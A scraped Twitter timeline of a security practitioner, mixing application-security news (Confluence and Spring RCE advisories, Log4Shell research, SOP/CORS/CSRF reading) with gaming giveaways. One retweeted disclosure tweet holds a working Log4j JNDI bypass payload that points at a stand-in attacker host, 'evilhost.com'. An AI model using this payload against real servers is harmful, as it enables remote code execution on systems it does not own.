Jerrin Jacob

Wrote a simple CSP report violations listener in GO. github.com/jerrinss5/CSP-…

🔑How does a FIDO security key limit the hacks we're seeing in the news now?🔑 Beyond fun to work with @Yubico & partner with @Twitter to answer that question + demo how social engineering is used to steal passwords & siphon out MFA codes to gain admin access with @EvanTobac.

@EddieHinkle Thanks for sharing this @EddieHinkle and congrats.

@ropnop Yeah I have referred to it countless times given that it's so tricky. And I am so glad you wrote a blog on it.

@JerrinJacob26 Thanks @JerrinJacob26! Really glad you find it useful - I still reference it myself all the time!

Huge shoutout to @ropnop on this article blog.ropnop.com/talk/2020/dont… of SOP, CORS and CSRF. I don't know how many times I have referred to this blog to make sure I understand these concepts properly. Looking forward to more of these.🙌

@zoocoup 🤣

@NVIDIAGeForce Gtx 275

🔥 Summer of RTX keeps on giving 🔥 We have 15 GeForce RTX 3080 Ti GPUs up for grabs👀 Want one?! Let us know the first GPU you gamed on + comment #RTXON👇

@zoocoup Thanks @zoocoup

Atlassian is warning about a zero-day in Confluence (CVE-2022-26134). This is a pre-auth, remote code execution bug. No patch yet. Atlassian credits @Volexity which reported it after responding to different victims who got shells/backdoors via this flaw. confluence.atlassian.com/doc/confluence…

Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134) bugalert.org/content/notice…

Absolutely my favorite #AppSec publication and news source. tldrsec.com/blog/tldr-sec-… Outstanding blog from @clintgibler

We have a working exploit for the new spring rce vulnerability praetorian.com/blog/spring-co…

FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n

CVE-2021-45046 is vulnerable when attackers can control **non-message** parts of the pattern layout. Here are some examples 🧵

We've updated the blog post on Log4Shell: Reconnaissance and post exploitation network detection - New vulnerable .class / .jar hunter script - Python 3 - github.com/fox-it/log4j-f… - New JNDI ExploitKit analysis - .. and more research.nccgroup.com/2021/12/12/log…

More details on the @CloudNativeFdn #Notaryv2 Alpha 1 release, supporting #signing of @docker images and other #securesupplychain artifacts: notaryproject.dev/blog/2021/anno…

@madebygoogle In Vermont #pixel2xl

#TeamPixel we're 14 days into October, time for a 🍁 color check. Snap a pic and share the leaves in your area.

Apple users warned: Clicking this attachment will take over your macOS arstechnica.com/information-te…

Calling all bounty hunters - it’s officially go time! We’ve just released the full details of our algorithmic bias bounty challenge which is open through August 6. For more details on the challenge, head over to our blog 👇 blog.twitter.com/engineering/en…

@GamersNexus Just received mine. Thank you so much. It looks and feels awesome. Although I was hoping I would be lucky with the the signed ones. 😅

GN wireframe mouse mats are back in stock & shipping now! We're mixing in some signed ones at random with the existing back-orders & some of the new orders. store.gamersnexus.net/products/gn-wi…

I’m teaching a secure coding masterclass at GOTOpia Chicago on April 19th, this Monday! If you care to join please use discount code jim10 for 10% off. gotochgo.com/2021/mastercla… I hope to see you there! Please RT! :)